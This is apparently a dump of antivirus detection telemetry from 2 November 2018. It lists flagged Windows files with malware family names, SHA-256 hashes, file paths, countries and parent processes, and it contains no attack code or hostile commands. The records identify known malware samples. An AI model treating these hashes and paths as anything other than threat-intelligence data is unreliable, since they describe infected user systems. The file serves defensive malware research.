  Row(detection=Row(filename='setup.exe', filepath='C:\\Program Files (x86)\\Intel\\Intel(R) Processor Graphics\\uninstall\\Setup.exe', filesize=1096000, name='W32/Jeefo.A.#M1.#R1'), hash='32b40409c157056050fd928b0ff73ffe9b91fc84f5c765b028d88b1a864b4b89', metadata=Row(cmdline='\\\\\\/Processid:{06622D85-6856-4460-8DE1-A81921B41C4B}', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\SysWOW64\\dllhost.exe', parentsize=7168, timestamp='2018-11-02T10:01:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='a0016769.exe', filepath='\\\\?\\L:\\System Volume Information\\_restore{AE0778D3-AEE6-4B14-9393-AA69173A7867}\\RP27\\A0016769.exe', filesize=9216000, name='TR/Crypt.XPACK.Gen3.#M300.#R200067'), hash='32c47dda5925bf1b8f2c81d7af177e17d2bf489883d47d7731e0a66aea5d7ce5', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T03:15:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='33cbdd173ae056011b2b83b9bf73a10732e09c7db212fc10b50186e885798ac3', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-17\\33CBDD173AE056011B2B83B9BF73A10732E09C7DB212FC10B50186E885798AC3', filesize=320000, name='W2000M/Marker.BO.#M1.#R1'), hash='33cbdd173ae056011b2b83b9bf73a10732e09c7db212fc10b50186e885798ac3', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-17.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-18.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-19.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-20.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-16.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T05:53:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='asal2.exe', filepath='H:\\Lab\\asal2.exe', filesize=5120000, name='W32/Infector.Gen.#M300.#R7863'), hash='3446e4d17f89d73b3c25c7e8560259889ee4f7db15df9fb8dc8efd2a5ae04286', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\malpwt2007\\Malaysia PWT 2018I.exe', parentsize=3497984, timestamp='2018-11-02T03:37:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-163003-dcc5b996', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8b25ab4e\\AVSCAN-20181102-162834-CD9A72A7\\AVSCAN-20181102-163003-DCC5B996', filesize=2288000, name='PUA/InstallCore.Gen.#M1.#R1'), hash='348888a26e74093c0f08d368a961257b96b0f5c4533a693746bef050d1b8d0cf', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T18:29:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='clickjogos - sirenix surfistas - winx club (1).exe', filepath='C:\\Users\\X\\Documents\\DRAFTS\\Cotações  2016\\ClickJogos - Sirenix Surfistas - Winx Club (1).exe', filesize=2288000, name='PUA/InstallCore.Gen.#M300.#R8158'), hash='348888a26e74093c0f08d368a961257b96b0f5c4533a693746bef050d1b8d0cf', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-02T18:28:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='clickjogos - sirenix surfistas - winx club.exe', filepath='C:\\Users\\X\\Documents\\DRAFTS\\Cotações  2016\\ClickJogos - Sirenix Surfistas - Winx Club.exe', filesize=2288000, name='PUA/InstallCore.Gen.#M300.#R8158'), hash='348888a26e74093c0f08d368a961257b96b0f5c4533a693746bef050d1b8d0cf', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-02T18:28:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-162903-d29d3cb3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8b25ab4e\\AVSCAN-20181102-162834-CD9A72A7\\AVSCAN-20181102-162903-D29D3CB3', filesize=2288000, name='PUA/InstallCore.Gen.#M1.#R1'), hash='348888a26e74093c0f08d368a961257b96b0f5c4533a693746bef050d1b8d0cf', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T18:29:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='348ff2648677b1817495d85ef8538b636321019d99c4b8f28d569f1492661231', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-20\\348FF2648677B1817495D85EF8538B636321019D99C4B8F28D569F1492661231', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='348ff2648677b1817495d85ef8538b636321019d99c4b8f28d569f1492661231', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:18:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='libapriconv-1.dll', filepath='G:\\PPGBM Offline LV\\apache2\\bin\\libapriconv-1.dll', filesize=152000, name='W32/Ramnit.C.#M1.#R1'), hash='34e14ee7b7f49d408e266242f1c74209a7151e3b7cd57498f6f3611ca9ae9daf', metadata=Row(cmdline='rtp', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\SMADAV\\SMΔRTP.exe', parentsize=1716224, timestamp='2018-11-02T04:40:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='grz.dll', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\nse1BBF.tmp\\grz.dll', filesize=128000, name='PUA/Outbrowse.Gen.#M300.#R5697'), hash='3577e7c4fa2928e55c23297eab7408e1aee995c8695eee43bd05be25d3238ec2', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T08:51:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='sentstrt.exe', filepath='\\?\\G:\\PLC程式\\GT-D V6.4\\SystemDriverOld\\WIN_9x\\sentstrt.exe', filesize=256000, name='W32/Jadtre.K.#M1.#R1'), hash='35a934634fb69c7ea994979823e3aa00962a172b0d06f2aa24751081c4de7849', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:28:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered fodar', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered fodar', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='35d68f729ac3beb6920e8a8f9bd7a7ee7fb5ef5ac1761d2d1f86d580d9c4e9e0', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:11:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered fodar', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered fodar', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='35d68f729ac3beb6920e8a8f9bd7a7ee7fb5ef5ac1761d2d1f86d580d9c4e9e0', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:11:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered fodar', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered fodar', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='35d68f729ac3beb6920e8a8f9bd7a7ee7fb5ef5ac1761d2d1f86d580d9c4e9e0', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T16:11:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered fodar', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered fodar', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='35d68f729ac3beb6920e8a8f9bd7a7ee7fb5ef5ac1761d2d1f86d580d9c4e9e0', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T18:11:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered fodar', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered fodar', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='35d68f729ac3beb6920e8a8f9bd7a7ee7fb5ef5ac1761d2d1f86d580d9c4e9e0', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:36:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered fodar', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered fodar', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='35d68f729ac3beb6920e8a8f9bd7a7ee7fb5ef5ac1761d2d1f86d580d9c4e9e0', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:11:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='password_idm.exe', filepath='D:\\Users\\X\\AppData\\Local\\Temp\\7ZipSfx.000\\password_IDM.exe', filesize=64000, name='HEUR/APC.#M1.#R1'), hash='35db408b7e00c3a0201978750faafc034292a9caf7bcf9f12d0a5889f03e385c', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T18:43:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-114149-cf1f4d1e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_262c9480\\AVSCAN-20181102-113642-942BE6CD\\AVSCAN-20181102-114149-CF1F4D1E', filesize=384000, name='HEUR/AGEN.1012225.#M1.#R1'), hash='35ec41a5ad0517ec1e10ef9c2c607081f17ccbc5f4b6de43942711cfac92e2db', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T14:41:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-181953-9337d451', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_98d4435e\\AVSCAN-20181102-181915-8E4EB9F0\\AVSCAN-20181102-181953-9337D451', filesize=2560000, name='TR/Black.Gen2.#M1.#R1'), hash='3600f95d74d3eedb693c26f0533afc0ac366bd857770711dbe9dafee1340bc5a', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T10:20:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mhautopatch.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Temp1_msoxh.zip\\msoxh\\MHAutoPatch.exe', filesize=2560000, name='TR/Black.Gen2.#M300.#R100338'), hash='3600f95d74d3eedb693c26f0533afc0ac366bd857770711dbe9dafee1340bc5a', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2501368, timestamp='2018-11-02T10:14:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mhautopatch.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Temp1_msoxh.zip\\msoxh\\MHAutoPatch.exe', filesize=2560000, name='TR/Black.Gen2.#M300.#R100338'), hash='3600f95d74d3eedb693c26f0533afc0ac366bd857770711dbe9dafee1340bc5a', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2501368, timestamp='2018-11-02T10:14:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mhautopatch.exe', filepath='C:\\Users\\X\\Desktop\\msoxh\\msoxh\\MHAutoPatch.exe', filesize=2560000, name='TR/Black.Gen2.#M300.#R100338'), hash='3600f95d74d3eedb693c26f0533afc0ac366bd857770711dbe9dafee1340bc5a', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2501368, timestamp='2018-11-02T10:14:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mhautopatch.exe', filepath='D:\\PC GAMER\\msoxh\\MHAutoPatch.exe', filesize=2560000, name='TR/Black.Gen2.#M300.#R100338'), hash='3600f95d74d3eedb693c26f0533afc0ac366bd857770711dbe9dafee1340bc5a', metadata=Row(cmdline='\\\\\\"C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\msoxh3(1).zip\\\\\\"', country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\WinRAR\\WinRAR.exe', parentsize=1531856, timestamp='2018-11-02T00:38:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-084034-52c7165f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_208d8027\\AVSCAN-20181102-084022-50894259\\AVSCAN-20181102-084034-52C7165F', filesize=2560000, name='TR/Black.Gen2.#M1.#R1'), hash='3600f95d74d3eedb693c26f0533afc0ac366bd857770711dbe9dafee1340bc5a', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T00:40:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-084723-9ed14087', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_208d8027\\AVSCAN-20181102-084705-9B95C50B\\AVSCAN-20181102-084723-9ED14087', filesize=2560000, name='TR/Black.Gen2.#M1.#R1'), hash='3600f95d74d3eedb693c26f0533afc0ac366bd857770711dbe9dafee1340bc5a', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T00:47:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-084002-4ccf6f0f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_208d8027\\AVSCAN-20181102-083950-4A7033CB\\AVSCAN-20181102-084002-4CCF6F0F', filesize=2560000, name='TR/Black.Gen2.#M1.#R1'), hash='3600f95d74d3eedb693c26f0533afc0ac366bd857770711dbe9dafee1340bc5a', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T00:40:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-085743-641ee976', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42b61ea2\\AVSCAN-20181102-085724-6084B2F7\\AVSCAN-20181102-085743-641EE976', filesize=2560000, name='TR/Black.Gen2.#M1.#R1'), hash='3600f95d74d3eedb693c26f0533afc0ac366bd857770711dbe9dafee1340bc5a', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T00:57:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mhautopatch.exe', filepath='C:\\Users\\X\\Desktop\\MHAutoPatch.exe', filesize=2560000, name='TR/Black.Gen2.#M300.#R100338'), hash='3600f95d74d3eedb693c26f0533afc0ac366bd857770711dbe9dafee1340bc5a', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-02T09:04:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-190034-cb14a4cd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_98d4435e\\AVSCAN-20181102-185941-C45444E1\\AVSCAN-20181102-190034-CB14A4CD', filesize=2560000, name='TR/Black.Gen2.#M1.#R1'), hash='3600f95d74d3eedb693c26f0533afc0ac366bd857770711dbe9dafee1340bc5a', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T11:00:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-083917-4467e333', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_208d8027\\AVSCAN-20181102-083903-41D0CB2D\\AVSCAN-20181102-083917-4467E333', filesize=2560000, name='TR/Black.Gen2.#M1.#R1'), hash='3600f95d74d3eedb693c26f0533afc0ac366bd857770711dbe9dafee1340bc5a', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T00:39:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-185956-c63a8620', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_98d4435e\\AVSCAN-20181102-185941-C45444E1\\AVSCAN-20181102-185956-C63A8620', filesize=2560000, name='TR/Black.Gen2.#M1.#R1'), hash='3600f95d74d3eedb693c26f0533afc0ac366bd857770711dbe9dafee1340bc5a', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T11:00:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-182144-a15f02a9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_98d4435e\\AVSCAN-20181102-181915-8E4EB9F0\\AVSCAN-20181102-182144-A15F02A9', filesize=2560000, name='TR/Black.Gen2.#M1.#R1'), hash='3600f95d74d3eedb693c26f0533afc0ac366bd857770711dbe9dafee1340bc5a', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T10:21:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-214627-8471daf1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3607a123\\AVSCAN-20181102-214348-640D9348\\AVSCAN-20181102-214627-8471DAF1', filesize=2560000, name='TR/Black.Gen2.#M1.#R1'), hash='3600f95d74d3eedb693c26f0533afc0ac366bd857770711dbe9dafee1340bc5a', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:46:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-214612-8161eb3b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3607a123\\AVSCAN-20181102-214348-640D9348\\AVSCAN-20181102-214612-8161EB3B', filesize=2560000, name='TR/Black.Gen2.#M1.#R1'), hash='3600f95d74d3eedb693c26f0533afc0ac366bd857770711dbe9dafee1340bc5a', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:46:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-182144-a15f02a9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_98d4435e\\AVSCAN-20181102-181915-8E4EB9F0\\AVSCAN-20181102-182144-A15F02A9', filesize=2560000, name='TR/Black.Gen2.#M1.#R1'), hash='3600f95d74d3eedb693c26f0533afc0ac366bd857770711dbe9dafee1340bc5a', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T10:21:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mhautopatch_d7152bac.exe', filepath='C:\\Users\\X\\Desktop\\msoxh\\msoxh\\MHAutoPatch_d7152bac.exe', filesize=2560000, name='TR/Black.Gen2.#M300.#R100338'), hash='3600f95d74d3eedb693c26f0533afc0ac366bd857770711dbe9dafee1340bc5a', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe20_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe20 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='MY', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=272896, timestamp='2018-11-02T10:58:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mhautopatch.exe', filepath='C:\\Users\\X\\Downloads\\msoxh\\MHAutoPatch.exe', filesize=2560000, name='TR/Black.Gen2.#M300.#R100338'), hash='3600f95d74d3eedb693c26f0533afc0ac366bd857770711dbe9dafee1340bc5a', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Downloads\\msoxh (3).exe', parentsize=948427824, timestamp='2018-11-02T13:16:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-171200-6ad1b918', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3607a123\\AVSCAN-20181102-171046-5BBD7D9E\\AVSCAN-20181102-171200-6AD1B918', filesize=2560000, name='TR/Black.Gen2.#M1.#R1'), hash='3600f95d74d3eedb693c26f0533afc0ac366bd857770711dbe9dafee1340bc5a', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:12:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-085902-72bb4f52', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42b61ea2\\AVSCAN-20181102-085842-6F1BE58F\\AVSCAN-20181102-085902-72BB4F52', filesize=2560000, name='TR/Black.Gen2.#M1.#R1'), hash='3600f95d74d3eedb693c26f0533afc0ac366bd857770711dbe9dafee1340bc5a', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T00:59:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-170611-238e7088', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3607a123\\AVSCAN-20181102-170528-1AF72220\\AVSCAN-20181102-170611-238E7088', filesize=2560000, name='TR/Black.Gen2.#M1.#R1'), hash='3600f95d74d3eedb693c26f0533afc0ac366bd857770711dbe9dafee1340bc5a', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:06:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-084317-70fbd4f6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_208d8027\\AVSCAN-20181102-084259-6DA60A05\\AVSCAN-20181102-084317-70FBD4F6', filesize=2560000, name='TR/Black.Gen2.#M1.#R1'), hash='3600f95d74d3eedb693c26f0533afc0ac366bd857770711dbe9dafee1340bc5a', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T00:43:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-212431-787932d1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3607a123\\AVSCAN-20181102-212258-658C136D\\AVSCAN-20181102-212431-787932D1', filesize=2560000, name='TR/Black.Gen2.#M1.#R1'), hash='3600f95d74d3eedb693c26f0533afc0ac366bd857770711dbe9dafee1340bc5a', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:24:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mhautopatch.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa3016.39785\\msoxh\\MHAutoPatch.exe', filesize=2560000, name='TR/Black.Gen2.#M300.#R100338'), hash='3600f95d74d3eedb693c26f0533afc0ac366bd857770711dbe9dafee1340bc5a', metadata=Row(cmdline='\\\\\\"C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\msoxh (3).zip\\\\\\"', country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Desktop\\WinRAR.exe', parentsize=2199256, timestamp='2018-11-02T08:32:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mhautopatch.exe', filepath='D:\\PC GAMER\\msoxh\\MHAutoPatch.exe', filesize=2560000, name='TR/Black.Gen2.#M300.#R100338'), hash='3600f95d74d3eedb693c26f0533afc0ac366bd857770711dbe9dafee1340bc5a', metadata=Row(cmdline='\\\\\\"C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\msoxh3.zip\\\\\\"', country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\WinRAR\\WinRAR.exe', parentsize=1531856, timestamp='2018-11-02T00:57:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-110335-2461274c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8cb68e92\\AVSCAN-20181102-110244-1CA52070\\AVSCAN-20181102-110335-2461274C', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:03:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-201343-a2be9cf3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ce4c9676\\AVSCAN-20181102-201326-A0901F90\\AVSCAN-20181102-201343-A2BE9CF3', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T19:13:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='autorun.exe', filepath='f:\\autorun.exe', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-02T10:02:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-111426-5160cecd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_92129e13\\AVSCAN-20181102-111312-42445F9E\\AVSCAN-20181102-111426-5160CECD', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T10:19:54Z'), dt=datetime.date(2018, 11, 2)),
